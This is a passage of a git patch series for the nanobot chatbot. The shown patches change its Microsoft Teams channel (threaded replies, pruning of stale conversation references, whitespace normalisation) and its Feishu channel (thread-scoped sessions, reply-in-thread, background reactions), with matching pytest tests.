From 7e65884acb9ae82bfb2f831219a2b9be81f910dc Mon Sep 17 00:00:00 2001 From: T3chC0wb0y Date: Fri, 24 Apr 2026 15:19:08 -0500 Subject: [PATCH 01/25] fix(msteams): send threaded replies via replyToId --- nanobot/channels/msteams.py | 3 +-- tests/test_msteams.py | 4 ++-- 2 files changed, 3 insertions(+), 4 deletions(-) diff --git a/nanobot/channels/msteams.py b/nanobot/channels/msteams.py index 427b35f8c..fc25f2fbb 100644 --- a/nanobot/channels/msteams.py +++ b/nanobot/channels/msteams.py @@ -220,7 +220,6 @@ class MSTeamsChannel(BaseChannel): token = await self._get_access_token() base_url = f"{ref.service_url.rstrip('/')}/v3/conversations/{ref.conversation_id}/activities" use_thread_reply = self.config.reply_in_thread and bool(ref.activity_id) - url = f"{base_url}/{ref.activity_id}" if use_thread_reply else base_url headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json", @@ -233,7 +232,7 @@ class MSTeamsChannel(BaseChannel): payload["replyToId"] = ref.activity_id try: - resp = await self._http.post(url, headers=headers, json=payload) + resp = await self._http.post(base_url, headers=headers, json=payload) resp.raise_for_status() logger.info("MSTeams message sent to {}", ref.conversation_id) except Exception as e: diff --git a/tests/test_msteams.py b/tests/test_msteams.py index f5597c38d..b4ed59092 100644 --- a/tests/test_msteams.py +++ b/tests/test_msteams.py @@ -371,7 +371,7 @@ async def test_get_access_token_uses_configured_tenant(make_channel): @pytest.mark.asyncio -async def test_send_replies_to_activity_when_reply_in_thread_enabled(make_channel): +async def test_send_posts_to_conversation_with_reply_to_id_when_reply_in_thread_enabled(make_channel): ch = make_channel(replyInThread=True) fake_http = FakeHttpClient() ch._http = fake_http @@ -387,7 +387,7 @@ async def test_send_replies_to_activity_when_reply_in_thread_enabled(make_channe assert len(fake_http.calls) == 1 url, kwargs = fake_http.calls[0] - assert url == "https://smba.trafficmanager.net/amer/v3/conversations/conv-123/activities/activity-1" + assert url == "https://smba.trafficmanager.net/amer/v3/conversations/conv-123/activities" assert kwargs["headers"]["Authorization"] == "Bearer tok" assert kwargs["json"]["text"] == "Reply text" assert kwargs["json"]["replyToId"] == "activity-1" From 722d935d378e717b3ce25cd58bbd7d10fc763a92 Mon Sep 17 00:00:00 2001 From: T3chC0wb0y Date: Fri, 24 Apr 2026 15:53:17 -0500 Subject: [PATCH 02/25] fix(msteams): prune bad notify refs --- nanobot/channels/msteams.py | 27 +++++++++++++++++++++++++++ tests/test_msteams.py | 33 +++++++++++++++++++++++++++++++++ 2 files changed, 60 insertions(+) diff --git a/nanobot/channels/msteams.py b/nanobot/channels/msteams.py index fc25f2fbb..d2addacca 100644 --- a/nanobot/channels/msteams.py +++ b/nanobot/channels/msteams.py @@ -70,6 +70,7 @@ class ConversationRef: activity_id: str | None = None conversation_type: str | None = None tenant_id: str | None = None + updated_at: float | None = None class MSTeamsChannel(BaseChannel): @@ -288,7 +289,9 @@ class MSTeamsChannel(BaseChannel): activity_id=activity_id or None, conversation_type=conversation_type or None, tenant_id=str((channel_data.get("tenant") or {}).get("id") or "") or None, + updated_at=time.time(), ) + self._save_refs() await self._handle_message( @@ -493,6 +496,14 @@ class MSTeamsChannel(BaseChannel): def _save_refs(self) -> None: """Persist conversation references.""" try: + stale_keys = [ + key + for key, ref in self._conversation_refs.items() + if self._is_stale_or_unsupported_ref(ref) + ] + for key in stale_keys: + self._conversation_refs.pop(key, None) + data = { key: { "service_url": ref.service_url, @@ -501,6 +512,7 @@ class MSTeamsChannel(BaseChannel): "activity_id": ref.activity_id, "conversation_type": ref.conversation_type, "tenant_id": ref.tenant_id, + "updated_at": ref.updated_at, } for key, ref in self._conversation_refs.items() } @@ -508,6 +520,21 @@ class MSTeamsChannel(BaseChannel): except Exception as e: logger.warning("Failed to save MSTeams conversation refs: {}", e) + def _is_stale_or_unsupported_ref(self, ref: ConversationRef) -> bool: + """Reject unsupported refs and prune old refs.""" + service_url = (ref.service_url or "").strip().lower() + conversation_type = (ref.conversation_type or "").strip().lower() + updated_at = ref.updated_at or 0.0 + max_age_seconds = 30 * 24 * 60 * 60 + + if "webchat.botframework.com" in service_url: + return True + if conversation_type and conversation_type != "personal": + return True + if updated_at and updated_at < time.time() - max_age_seconds: + return True + return False + async def _get_access_token(self) -> str: """Fetch an access token for Bot Framework / Azure Bot auth.""" diff --git a/tests/test_msteams.py b/tests/test_msteams.py index b4ed59092..3dbfdfb2f 100644 --- a/tests/test_msteams.py +++ b/tests/test_msteams.py @@ -1,4 +1,5 @@ import json +import time import pytest @@ -551,6 +552,38 @@ async def test_start_logs_install_hint_when_pyjwt_missing(make_channel, monkeypa assert errors == ["PyJWT not installed. Run: pip install nanobot-ai[msteams]"] +def test_save_refs_prunes_webchat_and_stale_refs(make_channel): + ch = make_channel() + now = time.time() + ch._conversation_refs = { + "teams-good": ConversationRef( + service_url="https://smba.trafficmanager.net/amer/", + conversation_id="teams-good", + conversation_type="personal", + updated_at=now, + ), + "webchat-bad": ConversationRef( + service_url="https://webchat.botframework.com/", + conversation_id="webchat-bad", + conversation_type=None, + updated_at=now, + ), + "teams-stale": ConversationRef( + service_url="https://smba.trafficmanager.net/amer/", + conversation_id="teams-stale", + conversation_type="personal", + updated_at=now - (31 * 24 * 60 * 60), + ), + } + + ch._save_refs() + + assert set(ch._conversation_refs) == {"teams-good"} + saved = json.loads(ch._refs_path.read_text(encoding="utf-8")) + assert set(saved) == {"teams-good"} + assert saved["teams-good"]["updated_at"] == pytest.approx(now) + + def test_msteams_default_config_includes_restart_notify_fields(): cfg = MSTeamsChannel.default_config() From fd3d7ea752dedaad2e3535a689a8539e9630d8e2 Mon Sep 17 00:00:00 2001 From: T3chC0wb0y Date: Fri, 24 Apr 2026 17:56:07 -0500 Subject: [PATCH 03/25] fix(msteams): normalize nbsp in inbound text --- nanobot/channels/msteams.py | 10 +++++++++- tests/test_msteams.py | 11 +++++++++++ 2 files changed, 20 insertions(+), 1 deletion(-) diff --git a/nanobot/channels/msteams.py b/nanobot/channels/msteams.py index d2addacca..f1c0ac1bc 100644 --- a/nanobot/channels/msteams.py +++ b/nanobot/channels/msteams.py @@ -312,10 +312,12 @@ class MSTeamsChannel(BaseChannel): """Extract the user-authored text from a Teams activity.""" text = str(activity.get("text") or "") text = self._strip_possible_bot_mention(text) + text = self._normalize_html_whitespace(text) channel_data = activity.get("channelData") or {} reply_to_id = str(activity.get("replyToId") or "").strip() normalized_preview = html.unescape(text).replace("&rsquo", "’").strip() + normalized_preview = normalized_preview.replace("\xa0", " ") normalized_preview = normalized_preview.replace("\r\n", "\n").replace("\r", "\n") preview_lines = [line.strip() for line in normalized_preview.split("\n")] while preview_lines and not preview_lines[0]: @@ -335,9 +337,15 @@ class MSTeamsChannel(BaseChannel): cleaned = re.sub(r"(?:\r?\n){3,}", "\n\n", cleaned) return cleaned.strip() + def _normalize_html_whitespace(self, text: str) -> str: + """Normalize common HTML whitespace/entities from Teams into plain text spacing.""" + normalized = html.unescape(text).replace("&rsquo", "’") + normalized = normalized.replace("\xa0", " ") + return normalized + def _normalize_teams_reply_quote(self, text: str) -> str: """Normalize Teams quoted replies into a compact structured form.""" - cleaned = html.unescape(text).replace("&rsquo", "’").strip() + cleaned = self._normalize_html_whitespace(text).strip() if not cleaned: return "" diff --git a/tests/test_msteams.py b/tests/test_msteams.py index 3dbfdfb2f..b4dcf34f2 100644 --- a/tests/test_msteams.py +++ b/tests/test_msteams.py @@ -261,6 +261,17 @@ def test_sanitize_inbound_text_keeps_normal_inline_message(make_channel): assert ch._sanitize_inbound_text(activity) == "normal inline message" +def test_sanitize_inbound_text_normalizes_nbsp_entities(make_channel): + ch = make_channel() + + activity = { + "text": "Hello from Teams", + "channelData": {}, + } + + assert ch._sanitize_inbound_text(activity) == "Hello from Teams" + + def test_sanitize_inbound_text_normalizes_reply_wrapper_without_reply_metadata(make_channel): ch = make_channel() From 13bb31c789facd8d8a85462420643409b1d03c81 Mon Sep 17 00:00:00 2001 From: chengyongru <2755839590@qq.com> Date: Thu, 16 Apr 2026 00:18:28 +0800 Subject: [PATCH 04/25] feat(feishu): add thread-scoped session isolation for group chats Thread replies (messages with root_id != message_id) in group chats now get their own session key: feishu:{chat_id}:{root_id}. This means each Feishu thread has an independent conversation context. Top-level group messages and all private chat messages keep the default session key (no override), consistent with Telegram and Slack channel behavior. Co-authored-by: shenchengtsi <228445050+shenchengtsi@users.noreply.github.com> --- nanobot/channels/feishu.py | 10 +++ tests/channels/test_feishu_reply.py | 95 ++++++++++++++++++++++++++++- 2 files changed, 103 insertions(+), 2 deletions(-) diff --git a/nanobot/channels/feishu.py b/nanobot/channels/feishu.py index 41e937801..1b049507d 100644 --- a/nanobot/channels/feishu.py +++ b/nanobot/channels/feishu.py @@ -1624,6 +1624,15 @@ class FeishuChannel(BaseChannel): if not content and not media_paths: return + # Build topic-scoped session key for conversation isolation. + # Group chat: thread replies (root_id != message_id) get a scoped + # session so each Feishu thread has its own conversation context. + # Private chat: no override — same behavior as Telegram/Slack. + if chat_type == "group" and root_id and root_id != message_id: + session_key = f"feishu:{chat_id}:{root_id}" + else: + session_key = None + # Forward to message bus reply_to = chat_id if chat_type == "group" else sender_id await self._handle_message( @@ -1640,6 +1649,7 @@ class FeishuChannel(BaseChannel): "root_id": root_id, "thread_id": thread_id, }, + session_key=session_key, ) except Exception as e: diff --git a/tests/channels/test_feishu_reply.py b/tests/channels/test_feishu_reply.py index 2ad466dcd..0028371af 100644 --- a/tests/channels/test_feishu_reply.py +++ b/tests/channels/test_feishu_reply.py @@ -3,7 +3,7 @@ import asyncio import json from pathlib import Path from types import SimpleNamespace -from unittest.mock import MagicMock, patch +from unittest.mock import AsyncMock, MagicMock, patch import pytest @@ -26,13 +26,14 @@ from nanobot.channels.feishu import FeishuChannel, FeishuConfig # Helpers # --------------------------------------------------------------------------- -def _make_feishu_channel(reply_to_message: bool = False) -> FeishuChannel: +def _make_feishu_channel(reply_to_message: bool = False, group_policy: str = "mention") -> FeishuChannel: config = FeishuConfig( enabled=True, app_id="cli_test", app_secret="secret", allow_from=["*"], reply_to_message=reply_to_message, + group_policy=group_policy, ) channel = FeishuChannel(config, MessageBus()) channel._client = MagicMock() @@ -443,3 +444,93 @@ async def test_on_message_no_extra_api_call_when_no_parent_id() -> None: channel._client.im.v1.message.get.assert_not_called() assert len(captured) == 1 + + +# --------------------------------------------------------------------------- +# Session key derivation tests +# --------------------------------------------------------------------------- + + +@pytest.mark.asyncio +async def test_session_key_group_with_root_id_is_thread_scoped() -> None: + """Group message with root_id gets a thread-scoped session key.""" + channel = _make_feishu_channel(group_policy="open") + bus_spy = [] + original_publish = channel.bus.publish_inbound + + async def capture(msg): + bus_spy.append(msg) + await original_publish(msg) + + channel.bus.publish_inbound = capture + channel._download_and_save_media = AsyncMock(return_value=(None, "")) + channel.transcribe_audio = AsyncMock(return_value="") + channel._add_reaction = AsyncMock(return_value=None) + + event = _make_feishu_event( + chat_type="group", + content='{"text": "hello"}', + root_id="om_root123", + message_id="om_child456", + ) + await channel._on_message(event) + + assert len(bus_spy) == 1 + assert bus_spy[0].session_key == "feishu:oc_abc:om_root123" + + +@pytest.mark.asyncio +async def test_session_key_group_no_root_id_uses_default() -> None: + """Group message without root_id uses default session key (no override).""" + channel = _make_feishu_channel(group_policy="open") + bus_spy = [] + original_publish = channel.bus.publish_inbound + + async def capture(msg): + bus_spy.append(msg) + await original_publish(msg) + + channel.bus.publish_inbound = capture + channel._download_and_save_media = AsyncMock(return_value=(None, "")) + channel.transcribe_audio = AsyncMock(return_value="") + channel._add_reaction = AsyncMock(return_value=None) + + event = _make_feishu_event( + chat_type="group", + content='{"text": "hello"}', + root_id=None, + message_id="om_001", + ) + await channel._on_message(event) + + assert len(bus_spy) == 1 + assert bus_spy[0].session_key_override is None + assert bus_spy[0].session_key == "feishu:oc_abc" + + +@pytest.mark.asyncio +async def test_session_key_private_chat_no_override() -> None: + """Private chat never overrides session key (consistent with Telegram/Slack).""" + channel = _make_feishu_channel() + bus_spy = [] + original_publish = channel.bus.publish_inbound + + async def capture(msg): + bus_spy.append(msg) + await original_publish(msg) + + channel.bus.publish_inbound = capture + channel._download_and_save_media = AsyncMock(return_value=(None, "")) + channel.transcribe_audio = AsyncMock(return_value="") + channel._add_reaction = AsyncMock(return_value=None) + + event = _make_feishu_event( + chat_type="p2p", + content='{"text": "hello"}', + root_id=None, + message_id="om_001", + ) + await channel._on_message(event) + + assert len(bus_spy) == 1 + assert bus_spy[0].session_key_override is None From d36fba8bf5e3e627ce37327f5f747aba7668ad6b Mon Sep 17 00:00:00 2001 From: chengyongru <2755839590@qq.com> Date: Thu, 16 Apr 2026 00:26:01 +0800 Subject: [PATCH 05/25] feat(feishu): add reply_in_thread for visual topic grouping MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit When reply_to_message config is enabled, the bot's first reply now uses reply_in_thread=True to create a visual topic/thread in the Feishu client. Subsequent chunks fall back to regular create. The reply_to_message default remains False for backward compatibility. Failed replies still fall back to regular send — messages are never silently dropped. --- nanobot/channels/feishu.py | 27 ++++++++--- tests/channels/test_feishu_reply.py | 72 +++++++++++++++++++++++++++++ 2 files changed, 92 insertions(+), 7 deletions(-) diff --git a/nanobot/channels/feishu.py b/nanobot/channels/feishu.py index 1b049507d..792022b62 100644 --- a/nanobot/channels/feishu.py +++ b/nanobot/channels/feishu.py @@ -1101,17 +1101,23 @@ class FeishuChannel(BaseChannel): logger.debug("Feishu: error fetching parent message {}: {}", message_id, e) return None - def _reply_message_sync(self, parent_message_id: str, msg_type: str, content: str) -> bool: - """Reply to an existing Feishu message using the Reply API (synchronous).""" + def _reply_message_sync(self, parent_message_id: str, msg_type: str, content: str, *, reply_in_thread: bool = False) -> bool: + """Reply to an existing Feishu message using the Reply API (synchronous). + + Args: + reply_in_thread: If True, reply as a thread/topic message + in the Feishu client. + """ from lark_oapi.api.im.v1 import ReplyMessageRequest, ReplyMessageRequestBody try: + body_builder = ReplyMessageRequestBody.builder().msg_type(msg_type).content(content) + if reply_in_thread: + body_builder = body_builder.reply_in_thread(True) request = ( ReplyMessageRequest.builder() .message_id(parent_message_id) - .request_body( - ReplyMessageRequestBody.builder().msg_type(msg_type).content(content).build() - ) + .request_body(body_builder.build()) .build() ) response = self._client.im.v1.message.reply(request) @@ -1430,11 +1436,18 @@ class FeishuChannel(BaseChannel): first_send = True # tracks whether the reply has already been used def _do_send(m_type: str, content: str) -> None: - """Send via reply (first message) or create (subsequent).""" + """Send via reply (first message) or create (subsequent). + + When reply_to_message is enabled, the first message uses + reply_in_thread=True to create a visual topic thread. + """ nonlocal first_send if reply_message_id and first_send: first_send = False - ok = self._reply_message_sync(reply_message_id, m_type, content) + ok = self._reply_message_sync( + reply_message_id, m_type, content, + reply_in_thread=self.config.reply_to_message, + ) if ok: return # Fall back to regular send if reply fails diff --git a/tests/channels/test_feishu_reply.py b/tests/channels/test_feishu_reply.py index 0028371af..088580415 100644 --- a/tests/channels/test_feishu_reply.py +++ b/tests/channels/test_feishu_reply.py @@ -534,3 +534,75 @@ async def test_session_key_private_chat_no_override() -> None: assert len(bus_spy) == 1 assert bus_spy[0].session_key_override is None + + +# --------------------------------------------------------------------------- +# reply_in_thread tests +# --------------------------------------------------------------------------- + + +@pytest.mark.asyncio +async def test_reply_uses_reply_in_thread_when_enabled() -> None: + """When reply_to_message is True, reply includes reply_in_thread=True.""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = True + channel._client.im.v1.message.reply.return_value = reply_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + metadata={"message_id": "om_001"}, + )) + + channel._client.im.v1.message.reply.assert_called_once() + call_args = channel._client.im.v1.message.reply.call_args + request = call_args[0][0] + assert request.request_body.reply_in_thread is True + + +@pytest.mark.asyncio +async def test_reply_without_reply_in_thread_when_disabled() -> None: + """When reply_to_message is False, reply does NOT use reply_in_thread.""" + channel = _make_feishu_channel(reply_to_message=False) + + create_resp = MagicMock() + create_resp.success.return_value = True + channel._client.im.v1.message.create.return_value = create_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + )) + + # No message_id in metadata → no reply attempt, direct create + channel._client.im.v1.message.create.assert_called_once() + + +@pytest.mark.asyncio +async def test_reply_keeps_fallback_when_reply_fails() -> None: + """Even with reply_to_message=True, fallback to create on reply failure.""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = False + reply_resp.code = 99991400 + reply_resp.msg = "rate limited" + channel._client.im.v1.message.reply.return_value = reply_resp + + create_resp = MagicMock() + create_resp.success.return_value = True + channel._client.im.v1.message.create.return_value = create_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + metadata={"message_id": "om_001"}, + )) + + channel._client.im.v1.message.reply.assert_called() + channel._client.im.v1.message.create.assert_called() From 8717832771caecf3de6567e82e7f519f7a5fa147 Mon Sep 17 00:00:00 2001 From: chengyongru <2755839590@qq.com> Date: Thu, 16 Apr 2026 00:27:26 +0800 Subject: [PATCH 06/25] perf(feishu): make reaction non-blocking to speed up inbound dispatch Reaction emoji is now added as a fire-and-forget background task instead of blocking the inbound message pipeline. This removes one API round-trip from the critical path before the agent starts processing. --- nanobot/channels/feishu.py | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/nanobot/channels/feishu.py b/nanobot/channels/feishu.py index 792022b62..4e5610eef 100644 --- a/nanobot/channels/feishu.py +++ b/nanobot/channels/feishu.py @@ -1556,8 +1556,9 @@ class FeishuChannel(BaseChannel): logger.debug("Feishu: skipping group message (not mentioned)") return - # Add reaction - reaction_id = await self._add_reaction(message_id, self.config.react_emoji) + # Add reaction (non-blocking — fire and forget) + reaction_id = None + asyncio.create_task(self._add_reaction(message_id, self.config.react_emoji)) # Parse content content_parts = [] From 2a9fc9392b5118078275cb45f09c3450555700cf Mon Sep 17 00:00:00 2001 From: chengyongru <2755839590@qq.com> Date: Sun, 19 Apr 2026 21:39:50 +0800 Subject: [PATCH 07/25] fix(feishu): use message_id as reply target and fix keyword-only arg Align reply targeting with deer-flow: always reply to the inbound message_id (not root_id). The Feishu Reply API keeps responses in the same topic automatically when the target message is inside a topic. Also fix run_in_executor calls that passed reply_in_thread as a positional arg to a keyword-only parameter, and route standalone tool hints through the reply API for group chats. --- nanobot/channels/feishu.py | 152 ++++++++++++++++++++++------ tests/channels/test_feishu_reply.py | 124 +++++++++++++++++++++++ 2 files changed, 244 insertions(+), 32 deletions(-) diff --git a/nanobot/channels/feishu.py b/nanobot/channels/feishu.py index 4e5610eef..47daa7dff 100644 --- a/nanobot/channels/feishu.py +++ b/nanobot/channels/feishu.py @@ -308,6 +308,8 @@ class FeishuChannel(BaseChannel): self._loop: asyncio.AbstractEventLoop | None = None self._stream_bufs: dict[str, _FeishuStreamBuf] = {} self._bot_open_id: str | None = None + self._background_tasks: set[asyncio.Task] = set() + self._reaction_ids: dict[str, str] = {} # message_id → reaction_id @staticmethod def _register_optional_event(builder: Any, method_name: str, handler: Any) -> Any: @@ -549,8 +551,11 @@ class FeishuChannel(BaseChannel): return None async def _add_reaction(self, message_id: str, emoji_type: str = "THUMBSUP") -> str | None: - """ - Add a reaction emoji to a message (non-blocking). + """Add a reaction emoji to a message. + + Returns the reaction_id on success, None on failure. + When called via a tracked background task, the returned reaction_id + is stored in ``_reaction_ids`` for later cleanup by ``send_delta``. Common emoji types: THUMBSUP, OK, EYES, DONE, OnIt, HEART """ @@ -594,6 +599,30 @@ class FeishuChannel(BaseChannel): loop = asyncio.get_running_loop() await loop.run_in_executor(None, self._remove_reaction_sync, message_id, reaction_id) + def _on_background_task_done(self, task: asyncio.Task) -> None: + """Callback: remove from tracking set and log unhandled exceptions.""" + self._background_tasks.discard(task) + if task.cancelled(): + return + try: + task.result() + except Exception as exc: + logger.warning("Background task failed: {}", exc) + + def _on_reaction_added(self, message_id: str, task: asyncio.Task) -> None: + """Callback: store reaction_id after background add-reaction completes.""" + if task.cancelled(): + return + try: + reaction_id = task.result() + if reaction_id: + self._reaction_ids[message_id] = reaction_id + except Exception: + pass # already logged by _on_background_task_done + # Trim cache to prevent unbounded growth + if len(self._reaction_ids) > 500: + self._reaction_ids.pop(next(iter(self._reaction_ids))) + # Regex to match markdown tables (header + separator + data rows) _TABLE_RE = re.compile( r"((?:^[ \t]*\|.+\|[ \t]*\n)(?:^[ \t]*\|[-:\s|]+\|[ \t]*\n)(?:^[ \t]*\|.+\|[ \t]*\n?)+)", @@ -1172,8 +1201,19 @@ class FeishuChannel(BaseChannel): logger.error("Error sending Feishu {} message: {}", msg_type, e) return None - def _create_streaming_card_sync(self, receive_id_type: str, chat_id: str) -> str | None: - """Create a CardKit streaming card, send it to chat, return card_id.""" + def _create_streaming_card_sync( + self, + receive_id_type: str, + chat_id: str, + reply_message_id: str | None = None, + ) -> str | None: + """Create a CardKit streaming card, send it to chat, return card_id. + + When *reply_message_id* is provided the card is delivered via the + reply API (with reply_in_thread=True) so it lands inside the + originating thread / topic. Otherwise the plain create-message + API is used. + """ from lark_oapi.api.cardkit.v1 import CreateCardRequest, CreateCardRequestBody card_json = { @@ -1202,13 +1242,19 @@ class FeishuChannel(BaseChannel): return None card_id = getattr(response.data, "card_id", None) if card_id: - message_id = self._send_message_sync( - receive_id_type, - chat_id, - "interactive", - json.dumps({"type": "card", "data": {"card_id": card_id}}), + card_content = json.dumps( + {"type": "card", "data": {"card_id": card_id}}, ensure_ascii=False ) - if message_id: + if reply_message_id: + sent = self._reply_message_sync( + reply_message_id, "interactive", card_content, + reply_in_thread=True, + ) + else: + sent = self._send_message_sync( + receive_id_type, chat_id, "interactive", card_content, + ) is not None + if sent: return card_id logger.warning( "Created streaming card {} but failed to send it to {}", card_id, chat_id @@ -1298,7 +1344,7 @@ class FeishuChannel(BaseChannel): _stream_end: Finalize the streaming card. _tool_hint: Delta is a formatted tool hint (for display only). message_id: Original message id (used with _stream_end for reaction cleanup). - reaction_id: Reaction id to remove on stream end. + chat_type: "group" or "p2p" — controls reply-in-thread for streaming cards. """ if not self._client: return @@ -1308,10 +1354,13 @@ class FeishuChannel(BaseChannel): # --- stream end: final update or fallback --- if meta.get("_stream_end"): - if (message_id := meta.get("message_id")) and (reaction_id := meta.get("reaction_id")): - await self._remove_reaction(message_id, reaction_id) + message_id = meta.get("message_id") + if message_id: + reaction_id = self._reaction_ids.pop(message_id, None) + if reaction_id: + await self._remove_reaction(message_id, reaction_id) # Add completion emoji if configured - if self.config.done_emoji and message_id: + if self.config.done_emoji: await self._add_reaction(message_id, self.config.done_emoji) buf = self._stream_bufs.pop(chat_id, None) @@ -1349,9 +1398,22 @@ class FeishuChannel(BaseChannel): {"config": {"wide_screen_mode": True}, "elements": chunk}, ensure_ascii=False, ) - await loop.run_in_executor( - None, self._send_message_sync, rid_type, chat_id, "interactive", card - ) + # Fallback: reply via the Reply API for group chats. + # Target message_id — the Feishu API keeps the reply in + # the same topic automatically. + _f_msg = meta.get("message_id") + fallback_msg_id = _f_msg if meta.get("chat_type", "group") == "group" else None + if fallback_msg_id: + await loop.run_in_executor( + None, lambda: self._reply_message_sync( + fallback_msg_id, "interactive", card, + reply_in_thread=True, + ), + ) + else: + await loop.run_in_executor( + None, self._send_message_sync, rid_type, chat_id, "interactive", card + ) return # --- accumulate delta --- @@ -1365,8 +1427,16 @@ class FeishuChannel(BaseChannel): now = time.monotonic() if buf.card_id is None: + # Send the streaming card as a reply for group chats so it + # lands inside the originating topic/thread. Always target + # message_id (the actual inbound message) — the Feishu Reply + # API keeps the response in the same topic automatically. + is_group = meta.get("chat_type", "group") == "group" + reply_msg_id = meta.get("message_id") if is_group else None card_id = await loop.run_in_executor( - None, self._create_streaming_card_sync, rid_type, chat_id + None, + self._create_streaming_card_sync, + rid_type, chat_id, reply_msg_id, ) if card_id: buf.card_id = card_id @@ -1410,43 +1480,58 @@ class FeishuChannel(BaseChannel): return # No active streaming card — send as a regular # interactive card with the same 🔧 prefix style. + # Use reply API for group chats so the hint stays in topic. card = json.dumps( {"config": {"wide_screen_mode": True}, "elements": [ {"tag": "markdown", "content": self._format_tool_hint_delta(hint)}, ]}, ensure_ascii=False, ) - await loop.run_in_executor( - None, self._send_message_sync, receive_id_type, msg.chat_id, "interactive", card - ) + _th_msg_id = msg.metadata.get("message_id") + _th_chat_type = msg.metadata.get("chat_type", "group") + if _th_msg_id and _th_chat_type == "group": + await loop.run_in_executor( + None, lambda: self._reply_message_sync( + _th_msg_id, "interactive", card, + reply_in_thread=True, + ), + ) + else: + await loop.run_in_executor( + None, self._send_message_sync, receive_id_type, msg.chat_id, "interactive", card + ) return # Determine whether the first message should quote the user's message. # Only the very first send (media or text) in this call uses reply; subsequent # chunks/media fall back to plain create to avoid redundant quote bubbles. + # Always target message_id — the Feishu Reply API keeps replies in the + # same topic automatically when the target message is inside a topic. reply_message_id: str | None = None + _msg_id = msg.metadata.get("message_id") if self.config.reply_to_message and not msg.metadata.get("_progress", False): - reply_message_id = msg.metadata.get("message_id") or None + reply_message_id = _msg_id # For topic group messages, always reply to keep context in thread elif msg.metadata.get("thread_id"): - reply_message_id = ( - msg.metadata.get("root_id") or msg.metadata.get("message_id") or None - ) + reply_message_id = _msg_id first_send = True # tracks whether the reply has already been used def _do_send(m_type: str, content: str) -> None: """Send via reply (first message) or create (subsequent). - When reply_to_message is enabled, the first message uses - reply_in_thread=True to create a visual topic thread. + For group chats the reply API always uses reply_in_thread=True. + The Feishu API automatically keeps replies inside existing + topics — reply_in_thread only creates a *new* topic when the + target message is a plain (non-topic) message. """ nonlocal first_send if reply_message_id and first_send: first_send = False + chat_type = msg.metadata.get("chat_type", "group") ok = self._reply_message_sync( reply_message_id, m_type, content, - reply_in_thread=self.config.reply_to_message, + reply_in_thread=chat_type == "group", ) if ok: return @@ -1556,9 +1641,13 @@ class FeishuChannel(BaseChannel): logger.debug("Feishu: skipping group message (not mentioned)") return - # Add reaction (non-blocking — fire and forget) - reaction_id = None - asyncio.create_task(self._add_reaction(message_id, self.config.react_emoji)) + # Add reaction (non-blocking — tracked background task) + task = asyncio.create_task( + self._add_reaction(message_id, self.config.react_emoji) + ) + self._background_tasks.add(task) + task.add_done_callback(self._on_background_task_done) + task.add_done_callback(lambda t: self._on_reaction_added(message_id, t)) # Parse content content_parts = [] @@ -1656,7 +1745,6 @@ class FeishuChannel(BaseChannel): media=media_paths, metadata={ "message_id": message_id, - "reaction_id": reaction_id, "chat_type": chat_type, "msg_type": msg_type, "parent_id": parent_id, diff --git a/tests/channels/test_feishu_reply.py b/tests/channels/test_feishu_reply.py index 088580415..24003810a 100644 --- a/tests/channels/test_feishu_reply.py +++ b/tests/channels/test_feishu_reply.py @@ -606,3 +606,127 @@ async def test_reply_keeps_fallback_when_reply_fails() -> None: channel._client.im.v1.message.reply.assert_called() channel._client.im.v1.message.create.assert_called() + + +@pytest.mark.asyncio +async def test_reply_no_reply_in_thread_for_p2p_chat() -> None: + """reply_in_thread should NOT be set for p2p chats (identified by chat_type).""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = True + channel._client.im.v1.message.reply.return_value = reply_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", # p2p chats also use oc_ prefix + content="hello", + metadata={"message_id": "om_001", "chat_type": "p2p"}, + )) + + channel._client.im.v1.message.reply.assert_called_once() + call_args = channel._client.im.v1.message.reply.call_args + request = call_args[0][0] + assert request.request_body.reply_in_thread is not True + + +@pytest.mark.asyncio +async def test_reply_uses_reply_in_thread_for_group_chat() -> None: + """reply_in_thread should be True for group chats (identified by chat_type).""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = True + channel._client.im.v1.message.reply.return_value = reply_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + metadata={"message_id": "om_001", "chat_type": "group"}, + )) + + channel._client.im.v1.message.reply.assert_called_once() + call_args = channel._client.im.v1.message.reply.call_args + request = call_args[0][0] + assert request.request_body.reply_in_thread is True + + +@pytest.mark.asyncio +async def test_reply_targets_message_id_when_in_topic() -> None: + """When inbound message is inside a topic (root_id != message_id), + the reply should target the inbound message_id (not root_id). + The Feishu Reply API keeps the response in the same topic + automatically when the target message is already inside a topic.""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = True + channel._client.im.v1.message.reply.return_value = reply_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + metadata={ + "message_id": "om_child456", + "chat_type": "group", + "root_id": "om_root123", + }, + )) + + channel._client.im.v1.message.reply.assert_called_once() + call_args = channel._client.im.v1.message.reply.call_args + request = call_args[0][0] + # Should reply to the inbound message_id, not the root + assert request.message_id == "om_child456" + assert request.request_body.reply_in_thread is True + + +def test_on_reaction_added_stores_reaction_id() -> None: + """_on_reaction_added stores the returned reaction_id in _reaction_ids.""" + channel = _make_feishu_channel() + loop = asyncio.new_event_loop() + try: + task = loop.create_task(asyncio.sleep(0, result="reaction_abc")) + loop.run_until_complete(task) + channel._on_reaction_added("om_001", task) + finally: + loop.close() + + assert channel._reaction_ids["om_001"] == "reaction_abc" + + +def test_on_reaction_added_skips_none_result() -> None: + """_on_reaction_added does not store None results.""" + channel = _make_feishu_channel() + loop = asyncio.new_event_loop() + try: + task = loop.create_task(asyncio.sleep(0, result=None)) + loop.run_until_complete(task) + channel._on_reaction_added("om_001", task) + finally: + loop.close() + + assert "om_001" not in channel._reaction_ids + + +def 